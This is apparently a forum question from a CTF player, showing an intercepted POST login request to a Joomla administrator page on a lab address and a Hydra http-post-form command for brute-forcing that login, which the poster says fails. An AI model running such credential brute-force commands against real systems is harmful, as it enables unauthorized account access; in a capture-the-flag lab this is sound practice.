I am doing some CTF and stumbled upon a problem with Hydra when trying to use it towards a post request. I allready know how to solve this, but I am having truble with Hydra.
Intecepted from burp
POST /administrator/index.php HTTP/1.1
Host: 10.10.10.126
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.126/administrator/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Connection: close
Cookie: eaa83fe8b963ab08ce9ab7d4a798de05=0mvnlo2q2792fi1rortceo4or3; 2b01af51830ca9615359108de04d9ca1=bpsnvqrm2mf6hc5akvnr8ftdu1
Upgrade-Insecure-Requests: 1
username=admin&passwd=test&option=com_login&task=login&return=aW5kZXgucGhw&71800a4b802098aac7f3bbd7e49a8665=1
I've been googling a lot and tried several different things without success. What I did was the following:
hydra -l jonah -P test.txt 10.10.10.126 http-post-form "/administrator/index.php:username=^USER^&passwd=^PASS^&option=com_login&task=login&return=aW5kZXgucGhw&97f7e29809c1606df34ec3df81b10860=1:S=Warning:H=Cookie: eaa83fe8b963ab08ce9ab7d4a798de05=0mvnlo2q2792fi1rortceo4or3; 2b01af51830ca9615359108de04d9ca1=bpsnvqrm2mf6hc5akvnr8ftdu1"
-j is the correct username and
-P test.txt contains the correct password
Could someone tell me what is wrong with my request, and why it doesnt succeed?
